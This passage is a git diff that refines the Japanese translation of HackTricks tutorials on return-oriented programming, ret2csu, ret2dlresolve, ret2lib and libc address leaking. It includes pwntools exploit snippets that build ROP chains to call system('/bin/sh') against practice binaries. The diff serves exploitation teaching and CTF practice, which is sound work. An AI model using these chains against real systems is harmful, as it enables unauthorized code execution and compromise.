+- `pop ebx; ret`: 上記と似ていますが、`EBX` レジスタ用で、`EBX` を制御できるようにします。 - `mov [ebx], eax; ret`: `EAX` の値を `EBX` が指すメモリ位置に移動し、その後戻ります。これはしばしば **write-what-where gadget** と呼ばれます。 - さらに、`system()` 関数のアドレスも利用可能です。 ### **ROPチェーン** -**pwntools** を使用して、次のように ROPチェーンの実行のためにスタックを準備します。`system('/bin/sh')` を実行することを目指し、チェーンが次のように始まることに注意してください: +**pwntools** を使用して、次のように `system('/bin/sh')` を実行するためにROPチェーンの実行のためにスタックを準備します。チェーンは次のように始まります: 1. アライメント目的のための `ret` 命令(オプション) 2. `system` 関数のアドレス(ASLRが無効で、libcが既知であると仮定、詳細は [**Ret2lib**](ret2lib/index.html) を参照) @@ -83,16 +83,16 @@ p.interactive() #### **Finding Gadgets** -私たちの目的のために、**RDI** レジスタを設定することを可能にするガジェットに焦点を当てましょう(**"/bin/sh"** 文字列を **system()** に引数として渡すため)そしてその後 **system()** 関数を呼び出します。以下のガジェットを特定したと仮定します: +私たちの目的のために、**RDI** レジスタを設定することを可能にするガジェット(**"/bin/sh"** 文字列を **system()** に引数として渡すため)に焦点を当て、次に **system()** 関数を呼び出します。以下のガジェットを特定したと仮定します: -- **pop rdi; ret**: スタックのトップ値を **RDI** にポップし、その後戻ります。**system()** の引数を設定するために不可欠です。 -- **ret**: シンプルなリターンで、いくつかのシナリオでスタックの整列に役立ちます。 +- **pop rdi; ret**: スタックのトップ値を **RDI** にポップし、次に戻ります。**system()** の引数を設定するために不可欠です。 +- **ret**: 単純なリターンで、いくつかのシナリオでスタックの整列に役立ちます。 そして、**system()** 関数のアドレスを知っています。 ### **ROP Chain** -以下は、**pwntools** を使用して **system('/bin/sh')** を **x64** で実行することを目的とした ROP チェーンを設定し実行する例です: +以下は、**pwntools** を使用して **system('/bin/sh')** を **x64** で実行することを目的とした ROP チェーンを設定し、実行する例です: ```python from pwn import * @@ -130,17 +130,17 @@ p.interactive() この例では: - **`pop rdi; ret`** ガジェットを利用して **`RDI`** を **`"/bin/sh"`** のアドレスに設定します。 -- **`RDI`** を設定した後、チェーン内の **system()** のアドレスに直接ジャンプします。 +- **`RDI`** を設定した後、チェーン内の **system()** のアドレスで **`system()`** に直接ジャンプします。 - ターゲット環境が必要とする場合、**`ret_gadget`** がアライメントのために使用されます。これは、関数を呼び出す前に適切なスタックアライメントを確保するために **x64** でより一般的です。 ### スタックアライメント -**x86-64 ABI** は、**call命令** が実行されるときに **スタックが16バイトアライメント** されることを保証します。**LIBC** はパフォーマンスを最適化するために、**SSE命令**(例えば **movaps**)を使用し、これにはこのアライメントが必要です。スタックが正しくアライメントされていない場合(つまり **RSP** が16の倍数でない場合)、**ROPチェーン** での **system** への呼び出しは失敗します。これを修正するには、ROPチェーンで **system** を呼び出す前に **ret gadget** を追加するだけです。 +**x86-64 ABI** は、**call命令** が実行されるときに **スタックが16バイトアライメント** されることを保証します。**LIBC** はパフォーマンスを最適化するために、**SSE命令**(例えば **movaps**)を使用し、このアライメントを必要とします。スタックが適切にアライメントされていない場合(つまり **RSP** が16の倍数でない場合)、**ROPチェーン** での **system** などの関数への呼び出しは失敗します。これを修正するには、ROPチェーンで **system** を呼び出す前に **ret gadget** を追加するだけです。 -## x86とx64の主な違い +## x86 と x64 の主な違い > [!TIP] -> **x64は最初のいくつかの引数にレジスタを使用するため、** 単純な関数呼び出しにはx86よりも少ないガジェットを必要とすることが多いですが、レジスタの数が増え、アドレス空間が大きくなるため、適切なガジェットを見つけてチェーンすることはより複雑になる可能性があります。**x64** アーキテクチャのレジスタの数の増加とアドレス空間の拡大は、特にリターン指向プログラミング(ROP)の文脈において、エクスプロイト開発にとって機会と課題の両方を提供します。 +> **x64は最初のいくつかの引数にレジスタを使用するため、** 簡単な関数呼び出しにはx86よりも少ないガジェットを必要とすることが多いですが、レジスタの数が増え、アドレス空間が大きくなるため、適切なガジェットを見つけてチェーンすることはより複雑になる可能性があります。**x64** アーキテクチャのレジスタの数が増え、アドレス空間が大きくなることは、特にリターン指向プログラミング(ROP)の文脈において、エクスプロイト開発にとって機会と課題の両方を提供します。 ## ARM64のROPチェーンの例 @@ -184,7 +184,7 @@ rop-syscall-execv/ - [https://ir0nstone.gitbook.io/notes/types/stack/return-oriented-programming/exploiting-calling-conventions](https://ir0nstone.gitbook.io/notes/types/stack/return-oriented-programming/exploiting-calling-conventions) - [https://guyinatuxedo.github.io/15-partial_overwrite/hacklu15_stackstuff/index.html](https://guyinatuxedo.github.io/15-partial_overwrite/hacklu15_stackstuff/index.html) -- 64ビット、PIEとnxが有効、カナリアなし、`vsyscall` アドレスでRIPを上書きし、スタック内の次のアドレスに戻ることを唯一の目的とする部分的な上書き +- 64ビット、PIEとnxが有効、カナリアなし、`vsyscall` アドレスでRIPを上書きし、スタック内の次のアドレスに戻ることを目的とした部分的な上書き - [https://8ksec.io/arm64-reversing-and-exploitation-part-4-using-mprotect-to-bypass-nx-protection-8ksec-blogs/](https://8ksec.io/arm64-reversing-and-exploitation-part-4-using-mprotect-to-bypass-nx-protection-8ksec-blogs/) - arm64、ASLRなし、スタックを実行可能にし、スタック内のシェルコードにジャンプするためのROPガジェット diff --git a/src/binary-exploitation/rop-return-oriented-programing/ret2csu.md b/src/binary-exploitation/rop-return-oriented-programing/ret2csu.md index b4aed0d26..05fb128c4 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/ret2csu.md +++ b/src/binary-exploitation/rop-return-oriented-programing/ret2csu.md @@ -8,7 +8,7 @@ **ret2csu** は、プログラムを制御しようとする際に、通常使用する **gadgets** を見つけられない場合に使用されるハッキング技術です。 -プログラムが特定のライブラリ(libcなど)を使用している場合、異なるプログラムの部分が互いに通信する方法を管理するためのいくつかの組み込み関数があります。これらの関数の中には、特に `__libc_csu_init` と呼ばれる、私たちの欠けているgadgetsとして機能する隠れた宝石があります。 +プログラムが特定のライブラリ(libcなど)を使用している場合、プログラムの異なる部分が互いに通信する方法を管理するためのいくつかの組み込み関数があります。これらの関数の中には、特に `__libc_csu_init` と呼ばれる、私たちの欠けているgadgetsとして機能する隠れた宝石があります。 ### __libc_csu_init の魔法のガジェット @@ -28,14 +28,14 @@ ret; 2. 2番目のシーケンスは、設定した値を使用していくつかのことを行います: - **特定の値を他のレジスタに移動**し、関数のパラメータとして使用できるようにします。 -- **r15とrbxの値を足し合わせ、rbxを8倍することによって決定された場所にコールを実行**します。 +- **r15とrbxの値を足し合わせ、rbxを8倍して**決定された場所にコールを実行します。 ```armasm mov rdx, r15; mov rsi, r14; mov edi, r13d; call qword [r12 + rbx*8]; ``` -3. もしかしたら、そこに書き込むアドレスを知らないかもしれませんし、**`ret` 命令が必要です**。2番目のガジェットも**`ret` で終わりますが**、それに到達するためにはいくつかの**条件を満たす必要があります**: +3. もしかしたら、そこに書き込むアドレスを知らないかもしれませんし、**`ret` 命令が必要です**。2番目のガジェットも**`ret` で終わります**が、それに到達するためにはいくつかの**条件**を満たす必要があります: ```armasm mov rdx, r15; mov rsi, r14; @@ -83,8 +83,8 @@ syscall を行うか、`write()` のような関数を呼び出したいが、`r ここで **ret2csu** が登場します: -1. **レジスタの設定**: 最初のマジックガジェットを使用して、スタックから値をポップして rbx、rbp、r12 (edi)、r13 (rsi)、r14 (rdx)、および r15 に入れます。 -2. **2 番目のガジェットを使用**: これらのレジスタが設定されたら、2 番目のガジェットを使用します。これにより、選択した値を `rdx` と `rsi` に移動させ(それぞれ r14 と r13 から)、関数呼び出しのためのパラメータを準備します。さらに、`r15` と `rbx` を制御することで、計算したアドレスにある関数を呼び出すことができます。そして、そのアドレスを `[r15 + rbx*8]` に配置します。 +1. **レジスタの設定**: 最初のマジックガジェットを使用して、スタックから値をポップして rbx、rbp、r12 (edi)、r13 (rsi)、r14 (rdx)、r15 に入れます。 +2. **2 番目のガジェットを使用**: これらのレジスタが設定されたら、2 番目のガジェットを使用します。これにより、選択した値を `rdx` と `rsi` に移動させ(それぞれ r14 と r13 から)、関数呼び出しのパラメータを準備します。さらに、`r15` と `rbx` を制御することで、計算したアドレスにある関数を呼び出すことができます。 この技術を使用した[**例とその説明はこちら**](https://ir0nstone.gitbook.io/notes/types/stack/ret2csu/exploitation)で、これが使用された最終的なエクスプロイトです: ```python @@ -111,11 +111,11 @@ p.sendline(p64(elf.sym['win'])) # send to gets() so it's written print(p.recvline()) # should receive "Awesome work!" ``` > [!WARNING] -> 注意してください、前のエクスプロイトは**`RCE`**を行うことを目的としていません。これは、単に**`win`**という関数を呼び出すことを目的としています(ROPチェーン内でstdinからgetsを呼び出して`win`のアドレスを取得し、それをr15に格納します)第三引数として値`0xdeadbeefcafed00d`を持つものです。 +> 注意してください、前のエクスプロイトは**`RCE`**を行うことを目的としていません。これは、単に**`win`**という関数を呼び出すことを目的としています(ROPチェーン内でstdinからのgetsを呼び出して`win`のアドレスを取得し、それをr15に格納します)第三引数として値`0xdeadbeefcafed00d`を持つものです。 ### コールをバイパスしてretに到達する -以下のエクスプロイトは、**このページ**から抽出されました[**from this page**](https://guyinatuxedo.github.io/18-ret2_csu_dl/ropemporium_ret2csu/index.html) ここでは**ret2csu**が使用されていますが、コールを使用する代わりに、**比較をバイパスしてコールの後の`ret`に到達しています**: +以下のエクスプロイトは、[**このページ**](https://guyinatuxedo.github.io/18-ret2_csu_dl/ropemporium_ret2csu/index.html)から抽出されました。ここでは**ret2csu**が使用されていますが、コールを使用する代わりに、**比較をバイパスしてコールの後の`ret`に到達しています**: ```python # Code from https://guyinatuxedo.github.io/18-ret2_csu_dl/ropemporium_ret2csu/index.html # This exploit is based off of: https://www.rootnetsec.com/ropemporium-ret2csu/ @@ -165,7 +165,7 @@ payload += ret2win target.sendline(payload) target.interactive() ``` -### なぜ直接libcを使用しないのか? +### なぜlibcを直接使用しないのか? 通常、これらのケースは[**ret2plt**](../common-binary-protections-and-bypasses/aslr/ret2plt.md) + [**ret2lib**](ret2lib/index.html)にも脆弱ですが、時にはlibc内で直接見つけたガジェットで簡単に制御できる以上のパラメータを制御する必要があります。例えば、`write()`関数は3つのパラメータを必要とし、**これらすべてを直接設定するためのガジェットを見つけることは不可能かもしれません**。 diff --git a/src/binary-exploitation/rop-return-oriented-programing/ret2dlresolve.md b/src/binary-exploitation/rop-return-oriented-programing/ret2dlresolve.md index d28e7259f..0e1049c36 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/ret2dlresolve.md +++ b/src/binary-exploitation/rop-return-oriented-programing/ret2dlresolve.md @@ -8,12 +8,12 @@ **`_dl_runtime_resolve`** 関数は、指定されたシンボルを解決するために必要な構造体への参照をスタックから取得します。 -したがって、要求されたシンボル(例えば **`system`** 関数)を動的にリンクして解決するために、これらの構造体をすべて**偽造する**ことが可能です。そして、構成されたパラメータ(例: **`system('/bin/sh')`**)で呼び出すことができます。 +したがって、要求されたシンボル(例えば **`system`** 関数)を動的にリンクして解決するために、これらの構造体をすべて**偽装する**ことが可能であり、設定されたパラメータ(例:**`system('/bin/sh')`**)で呼び出すことができます。 -通常、これらの構造体は、書き込み可能なメモリ上で **`read`** を呼び出す**初期ROPチェーン**を作成することで偽造され、その後 **構造体** と文字列 **`'/bin/sh'`** が渡され、既知の場所に読み込まれます。そして、ROPチェーンは **`_dl_runtime_resolve`** を呼び出すことで続き、偽造された構造体内で **`system`** のアドレスを**解決し**、このアドレスを **`'/bin/sh'`** のアドレスで呼び出します。 +通常、これらの構造体は、書き込み可能なメモリ上で **`read`** を呼び出す**初期 ROP チェーンを作成することによって偽装され**、その後 **構造体** と文字列 **`'/bin/sh'`** が渡され、既知の場所に保存されます。そして、ROP チェーンは **`_dl_runtime_resolve`** を呼び出すことで続き、偽装された構造体内で **`system`** のアドレスを**解決し**、このアドレスを **`'/bin/sh'`** のアドレスで呼び出します。 > [!TIP] -> この技術は、syscallガジェットがない場合([**ret2syscall**](rop-syscall-execv/index.html) や [SROP](srop-sigreturn-oriented-programming/index.html) などの技術を使用するため)や、libcアドレスを漏洩させる方法がない場合に特に有用です。 +> この技術は、特に syscall ガジェットがない場合([**ret2syscall**](rop-syscall-execv/index.html) や [SROP](srop-sigreturn-oriented-programming/index.html) などの技術を使用するため)や libc アドレスを漏洩する方法がない場合に便利です。 この技術についての良い説明がある動画の後半をチェックしてください: @@ -21,20 +21,20 @@ https://youtu.be/ADULSwnQs-s?feature=shared {{#endref}} -または、ステップバイステップの説明があるこれらのページを確認してください: +また、ステップバイステップの説明があるこれらのページも確認してください: - [https://www.ctfrecipes.com/pwn/stack-exploitation/arbitrary-code-execution/code-reuse-attack/ret2dlresolve#how-it-works](https://www.ctfrecipes.com/pwn/stack-exploitation/arbitrary-code-execution/code-reuse-attack/ret2dlresolve#how-it-works) - [https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve#structures](https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve#structures) ## 攻撃の概要 -1. どこかに偽の構造体を書き込む +1. いくつかの場所に偽の構造体を書き込む 2. system の最初の引数を設定する(`$rdi = &'/bin/sh'`) 3. **`_dl_runtime_resolve`** を呼び出すための構造体へのアドレスをスタックに設定する 4. **呼び出す** `_dl_runtime_resolve` 5. **`system`** が解決され、`'/bin/sh'` を引数として呼び出される -[**pwntools documentation**](https://docs.pwntools.com/en/stable/rop/ret2dlresolve.html) から、これが **`ret2dlresolve`** 攻撃の様子です: +[**pwntools ドキュメント**](https://docs.pwntools.com/en/stable/rop/ret2dlresolve.html) から、**`ret2dlresolve`** 攻撃の様子は次のようになります: ```python context.binary = elf = ELF(pwnlib.data.elf.ret2dlresolve.get('amd64')) >>> rop = ROP(elf) @@ -58,7 +58,7 @@ context.binary = elf = ELF(pwnlib.data.elf.ret2dlresolve.get('amd64')) ### 純粋なPwntools -この[**技術の例はこちらにあります**](https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve/exploitation) **最終的なROPチェーンの非常に良い説明が含まれています**が、ここに使用された最終的なエクスプロイトがあります: +この[**技術の例はこちら**](https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve/exploitation) **に非常に良い最終ROPチェーンの説明が含まれていますが、ここに使用された最終的なエクスプロイトがあります:** ```python from pwn import * @@ -188,6 +188,6 @@ target.interactive() - [https://youtu.be/ADULSwnQs-s](https://youtu.be/ADULSwnQs-s?feature=shared) - [https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve](https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve) - [https://guyinatuxedo.github.io/18-ret2_csu_dl/0ctf18_babystack/index.html](https://guyinatuxedo.github.io/18-ret2_csu_dl/0ctf18_babystack/index.html) -- 32ビット、relroなし、canaryなし、nx、pieなし、基本的な小さなバッファオーバーフローとリターン。これを悪用するために、bofは再度`read`を呼び出すために使用され、`.bss`セクションとより大きなサイズを指定して、`dlresolve`の偽テーブルをそこに格納し、`system`をロードし、mainに戻り、最初のbofを再利用してdlresolveを呼び出し、その後`system('/bin/sh')`を呼び出します。 +- 32ビット、relroなし、canaryなし、nx、pieなし、基本的な小さなバッファオーバーフローとリターン。これを悪用するために、bofは再度`read`を呼び出すために使用され、`.bss`セクションとより大きなサイズを指定して、`system`をロードするための`dlresolve`の偽テーブルをそこに格納し、mainに戻り、最初のbofを再利用してdlresolveを呼び出し、その後`system('/bin/sh')`を実行します。 {{#include ../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/rop-return-oriented-programing/ret2lib/README.md b/src/binary-exploitation/rop-return-oriented-programing/ret2lib/README.md index d4a0fee3d..57504afe2 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/ret2lib/README.md +++ b/src/binary-exploitation/rop-return-oriented-programing/ret2lib/README.md @@ -9,7 +9,7 @@ ### **例の手順(簡略化)** - 呼び出す関数のアドレス(例:system)と呼び出すコマンド(例:/bin/sh)を取得する -- コマンド文字列を指す最初の引数と関数への実行フローを渡すROPチェーンを生成する +- 最初の引数としてコマンド文字列を指すROPチェーンを生成し、関数への実行フローを渡す ## アドレスの特定 @@ -17,11 +17,11 @@ ```bash ldd /path/to/executable | grep libc.so.6 #Address (if ASLR, then this change every time) ``` -ASLRがlibcのアドレスを変更しているかどうかを確認したい場合は、次のようにします: +ASLRがlibcのアドレスを変更しているかどうかを確認するには、次のようにします: ```bash for i in `seq 0 20`; do ldd ./ | grep libc; done ``` -- 使用されているlibcを知っていれば、`system`関数へのオフセットを見つけることも可能です。 +- 使用されているlibcを知っていれば、次のように`system`関数へのオフセットを見つけることも可能です: ```bash readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system ``` @@ -69,11 +69,11 @@ rop-leaking-libc-address/rop-leaking-libc-template.md これらのブルートフォース攻撃は**32ビットシステムにのみ有効**です。 -- エクスプロイトがローカルの場合、libcのベースアドレスをブルートフォースすることを試みることができます(32ビットシステムに有用): +- エクスプロイトがローカルである場合、libcのベースアドレスをブルートフォースすることを試みることができます(32ビットシステムに有用): ```python for off in range(0xb7000000, 0xb8000000, 0x1000): ``` -- リモートサーバーを攻撃する場合、**`libc`関数`usleep`のアドレスをブルートフォースする**ことを試みることができます。引数として10を渡します(例えば)。もしある時点で**サーバーが応答するのに10秒余分にかかる**場合、この関数のアドレスを見つけたことになります。 +- リモートサーバーを攻撃する場合、`libc`関数`usleep`のアドレスを**ブルートフォース**してみることができます。引数として10を渡します(例えば)。もしある時点で**サーバーが応答するのに10秒余分にかかる**場合、この関数のアドレスを見つけたことになります。 ## One Gadget @@ -103,7 +103,8 @@ c.interactive() ``` ## x64 Ret2lib コード例 -次の例を確認してください: +以下の例を確認してください: + {{#ref}} ../ @@ -115,7 +116,8 @@ ARM64の場合、ret命令はx30レジスタが指している場所にジャン また、ARM64では命令はその命令が行うことを行います(命令の途中でジャンプして新しい命令に変換することはできません)。 -次の例を確認してください: +以下の例を確認してください: + {{#ref}} ret2lib-+-printf-leak-arm64.md @@ -123,12 +125,13 @@ ret2lib-+-printf-leak-arm64.md ## Ret-into-printf (または puts) -これは、特定のデータを引数として指定して`printf`/`puts`を呼び出すことで**プロセスから情報を漏洩させる**ことを可能にします。例えば、`puts`のアドレスをGOTに入れて`puts`を実行すると、**メモリ内の`puts`のアドレスが漏洩します**。 +これは、特定のデータを引数として指定して`printf`/`puts`を呼び出すことで**プロセスから情報を漏洩させる**ことを可能にします。例えば、`puts`のアドレスをGOTに置いて`puts`を実行すると、**メモリ内の`puts`のアドレスが漏洩します**。 ## Ret2printf これは基本的に、**Ret2libを悪用して`printf`フォーマット文字列の脆弱性に変換する**ことを意味します。`ret2lib`を使用してprintfを呼び出し、悪用する値を渡します(無駄に聞こえますが可能です): + {{#ref}} ../../format-strings/ {{#endref}} @@ -136,16 +139,16 @@ ret2lib-+-printf-leak-arm64.md ## その他の例と参考文献 - [https://guyinatuxedo.github.io/08-bof_dynamic/csaw19_babyboi/index.html](https://guyinatuxedo.github.io/08-bof_dynamic/csaw19_babyboi/index.html) -- Ret2lib、libc内の関数のアドレスへの漏洩を利用し、one gadgetを使用 +- Ret2lib、libc内の関数のアドレスへの漏洩を与え、one gadgetを使用 - [https://guyinatuxedo.github.io/08-bof_dynamic/csawquals17_svc/index.html](https://guyinatuxedo.github.io/08-bof_dynamic/csawquals17_svc/index.html) -- 64ビット、ASLR有効だがPIEなし、最初のステップはオーバーフローを埋めてカナリアのバイト0x00まで到達し、次にputsを呼び出して漏洩させることです。カナリアを使ってROPガジェットを作成し、putsを呼び出してGOTからputsのアドレスを漏洩させ、次に`system('/bin/sh')`を呼び出すROPガジェットを作成します。 +- 64ビット、ASLR有効だがPIEなし、最初のステップはオーバーフローを満たし、カナリアのバイト0x00まで到達してからputsを呼び出し漏洩させる。カナリアを使用してROPガジェットを作成し、putsを呼び出してGOTからputsのアドレスを漏洩させ、次に`system('/bin/sh')`を呼び出すROPガジェットを作成 - [https://guyinatuxedo.github.io/08-bof_dynamic/fb19_overfloat/index.html](https://guyinatuxedo.github.io/08-bof_dynamic/fb19_overfloat/index.html) -- 64ビット、ASLR有効、カナリアなし、子関数からのメインでのスタックオーバーフロー。GOTからputsのアドレスを漏洩させるためにputsを呼び出すROPガジェットを作成し、その後one gadgetを呼び出します。 +- 64ビット、ASLR有効、カナリアなし、子関数からmainでスタックオーバーフロー。ROPガジェットを使用してputsを呼び出し、GOTからputsのアドレスを漏洩させ、その後one gadgetを呼び出す。 - [https://guyinatuxedo.github.io/08-bof_dynamic/hs19_storytime/index.html](https://guyinatuxedo.github.io/08-bof_dynamic/hs19_storytime/index.html) -- 64ビット、PIEなし、カナリアなし、relroなし、nx。write関数を使用してwrite(libc)のアドレスを漏洩させ、one gadgetを呼び出します。 +- 64ビット、PIEなし、カナリアなし、relroなし、nx。write関数を使用してwrite(libc)のアドレスを漏洩させ、one gadgetを呼び出す。 - [https://guyinatuxedo.github.io/14-ret_2_system/asis17_marymorton/index.html](https://guyinatuxedo.github.io/14-ret_2_system/asis17_marymorton/index.html) -- フォーマット文字列を使用してスタックからカナリアを漏洩させ、バッファオーバーフローを使用してsystem(GOT内)を呼び出し、`/bin/sh`のアドレスを渡します。 +- フォーマット文字列を使用してスタックからカナリアを漏洩させ、バッファオーバーフローを使用してsystem(GOT内)を呼び出し、`/bin/sh`のアドレスを渡す。 - [https://guyinatuxedo.github.io/14-ret_2_system/tu_guestbook/index.html](https://guyinatuxedo.github.io/14-ret_2_system/tu_guestbook/index.html) -- 32ビット、relroなし、カナリアなし、nx、pie。悪いインデックスを悪用してスタックからlibcとヒープのアドレスを漏洩させます。バッファオーバーフローを悪用して`system('/bin/sh')`を呼び出すret2libを行います(ヒープアドレスはチェックをバイパスするために必要です)。 +- 32ビット、relroなし、カナリアなし、nx、pie。悪いインデックスを悪用してスタックからlibcとヒープのアドレスを漏洩させる。バッファオーバーフローを悪用して`system('/bin/sh')`を呼び出すret2libを行う(ヒープアドレスはチェックをバイパスするために必要)。 {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/README.md b/src/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/README.md index 366f22efa..84980afd1 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/README.md +++ b/src/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/README.md @@ -1,4 +1,4 @@ -# ROPを使用したlibcアドレスのリーク +# ROPを使用したlibcアドレスの漏洩 {{#include ../../../../banners/hacktricks-training.md}} @@ -6,13 +6,13 @@ 1. **オーバーフローの**オフセットを**見つける** 2. `POP_RDI`ガジェット、`PUTS_PLT`および`MAIN`ガジェットを**見つける** -3. 前のガジェットを使用して**putsまたは他のlibc関数のメモリアドレスをリークし、**libcのバージョンを**見つける**([donwload it](https://libc.blukat.me)) -4. ライブラリを使用して、**ROPを計算し、エクスプロイトする** +3. 前のガジェットを使用して**putsまたは他のlibc関数のメモリアドレスを漏洩させ**、**libcのバージョンを見つける**([donwload it](https://libc.blukat.me)) +4. ライブラリを使用して、**ROPを計算し、悪用する** -## 練習用の他のチュートリアルとバイナリ +## 実践のための他のチュートリアルとバイナリ -このチュートリアルは、次のチュートリアルで提案されたコード/バイナリをエクスプロイトします: [https://tasteofsecurity.com/security/ret2libc-unknown-libc/](https://tasteofsecurity.com/security/ret2libc-unknown-libc/)\ -他の役立つチュートリアル: [https://made0x78.com/bseries-ret2libc/](https://made0x78.com/bseries-ret2libc/), [https://guyinatuxedo.github.io/08-bof_dynamic/csaw19_babyboi/index.html](https://guyinatuxedo.github.io/08-bof_dynamic/csaw19_babyboi/index.html) +このチュートリアルは、次のチュートリアルで提案されたコード/バイナリを悪用します: [https://tasteofsecurity.com/security/ret2libc-unknown-libc/](https://tasteofsecurity.com/security/ret2libc-unknown-libc/)\ +他の有用なチュートリアル: [https://made0x78.com/bseries-ret2libc/](https://made0x78.com/bseries-ret2libc/), [https://guyinatuxedo.github.io/08-bof_dynamic/csaw19_babyboi/index.html](https://guyinatuxedo.github.io/08-bof_dynamic/csaw19_babyboi/index.html) ## コード @@ -32,9 +32,10 @@ return 0; ```bash gcc -o vuln vuln.c -fno-stack-protector -no-pie ``` -## ROP - LIBCを漏洩させるテンプレート +## ROP - LIBCのリークテンプレート + +エクスプロイトをダウンロードし、脆弱なバイナリと同じディレクトリに配置し、スクリプトに必要なデータを提供します: -エクスプロイトをダウンロードし、脆弱なバイナリと同じディレクトリに配置し、スクリプトに必要なデータを提供します: {{#ref}} rop-leaking-libc-template.md @@ -57,7 +58,7 @@ r.sendline(payload) #cyclic_find(0x6161616b) # Find the offset of those bytes return ``` -**実行** `python template.py` を入力すると、プログラムがクラッシュした状態でGDBコンソールが開きます。その**GDBコンソール**内で `x/wx $rsp` を実行して、RIPを上書きしようとしている**バイト**を取得します。最後に、**python**コンソールを使用して**オフセット**を取得します: +**実行** `python template.py` すると、プログラムがクラッシュした状態で GDB コンソールが開きます。その **GDB コンソール** 内で `x/wx $rsp` を実行して、RIP を上書きしようとしている **バイト** を取得します。最後に、**python** コンソールを使用して **オフセット** を取得します: ```python from pwn import * cyclic_find(0x6161616b) @@ -71,7 +72,7 @@ cyclic_find(0x6161616b) ## 2- ガジェットの発見 -次に、バイナリ内でROPガジェットを見つける必要があります。このROPガジェットは、使用されている**libc**を見つけるために`puts`を呼び出すのに役立ち、後で**最終的なエクスプロイトを実行**するために使用されます。 +次に、バイナリ内でROPガジェットを見つける必要があります。このROPガジェットは、使用されている**libc**を見つけるために`puts`を呼び出すのに役立ち、後で**最終的なエクスプロイトを実行する**ために使用されます。 ```python PUTS_PLT = elf.plt['puts'] #PUTS_PLT = elf.symbols["puts"] # This is also valid to call puts MAIN_PLT = elf.symbols['main'] @@ -83,7 +84,7 @@ log.info("Puts plt: " + hex(PUTS_PLT)) log.info("pop rdi; ret gadget: " + hex(POP_RDI)) ``` `PUTS_PLT`は**function puts**を呼び出すために必要です。\ -`MAIN_PLT`は**exploit**のために**overflow**を**again**呼び出すために、1回のインタラクションの後に**main function**を再度呼び出すために必要です(無限のエクスプロイトのラウンド)。**各ROPの最後にプログラムを再度呼び出すために使用されます**。\ +`MAIN_PLT`は**exploit**のために**overflow**を**again**行うために、1回のインタラクションの後に**main function**を再度呼び出すために必要です(無限のエクスプロイトのラウンド)。**各ROPの最後にプログラムを再度呼び出すために使用されます**。\ **POP_RDI**は呼び出された関数に**parameter**を**pass**するために必要です。 このステップでは、実行中にpwntoolsによってすべてが見つかるため、何も実行する必要はありません。 @@ -123,12 +124,12 @@ p.interactive() ```python rop1 = OFFSET + p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT) ``` -これにより、**RIP**を**上書きする**ことが可能になるまでいくつかのバイトが送信されます: `OFFSET`。\ -次に、ガジェット`POP_RDI`の**アドレス**を設定し、次のアドレス(`FUNC_GOT`)が**RDI**レジスタに保存されるようにします。これは、**putsを呼び出す**ために、`PUTS_GOT`の**アドレス**を渡したいからです。puts関数のメモリ内のアドレスは`PUTS_GOT`が指すアドレスに保存されています。\ -その後、`PUTS_PLT`が呼び出され(**RDI**内に`PUTS_GOT`がある状態で)、putsは`PUTS_GOT`内の**内容を読み取ります**(**メモリ内のputs関数のアドレス**)そしてそれを**出力します**。\ +これは、**RIP**を**上書きする**ことが可能になるまでいくつかのバイトを送信します: `OFFSET`。\ +次に、**アドレス**を`POP_RDI`のガジェットに設定し、次のアドレス(`FUNC_GOT`)が**RDI**レジスタに保存されるようにします。これは、`PUTS_GOT`のアドレスを渡して**putsを呼び出す**ためです。なぜなら、puts関数のメモリ内のアドレスは`PUTS_GOT`が指すアドレスに保存されているからです。\ +その後、`PUTS_PLT`が呼び出され(**RDI**内に`PUTS_GOT`がある状態で)、putsは`PUTS_GOT`内の**内容を読み取り**(**メモリ内のputs関数のアドレス**)、それを**出力します**。\ 最後に、**main関数が再度呼び出され**、再びオーバーフローを利用できるようになります。 -この方法で、**puts関数を騙して**、**メモリ内の**関数**putsのアドレス**(**libc**ライブラリ内)を**出力させました**。そのアドレスがわかったので、**どのlibcバージョンが使用されているかを検索できます**。 +この方法で、**puts関数を騙して**、**メモリ内の**puts関数の**アドレス**(**libc**ライブラリ内)を**出力させました**。今、そのアドレスがあるので、**どのlibcバージョンが使用されているかを検索できます**。 ![](<../../../../images/image (1049).png>) @@ -137,7 +138,7 @@ rop1 = OFFSET + p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT) ### 3.1- libcバージョンの検索 (1) -ウェブページでどのライブラリが使用されているかを検索できます: [https://libc.blukat.me/](https://libc.blukat.me)\ +ウェブページで使用されているライブラリを検索できます: [https://libc.blukat.me/](https://libc.blukat.me)\ これにより、発見された**libc**のバージョンをダウンロードすることもできます。 ![](<../../../../images/image (221).png>) @@ -171,7 +172,7 @@ Getting libc6_2.23-0ubuntu10_amd64 -> Extracting package -> Package saved to libs/libc6_2.23-0ubuntu10_amd64 ``` -`libs/libc6_2.23-0ubuntu10_amd64/libc-2.23.so`を作業ディレクトリにコピーします。 +`libs/libc6_2.23-0ubuntu10_amd64/libc-2.23.so`からlibcを作業ディレクトリにコピーします。 ### 3.3- 漏洩させる他の関数 ```python @@ -185,7 +186,7 @@ gets この時点で、使用されているlibcライブラリを知っている必要があります。ローカルバイナリを悪用しているので、私は次のようにします:`/lib/x86_64-linux-gnu/libc.so.6` -したがって、`template.py`の最初に**libc**変数を次のように変更します: `libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") #Set library path when know it` +したがって、`template.py`の最初に**libc**変数を次のように変更します: `libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") #ライブラリパスを知っているときに設定する` 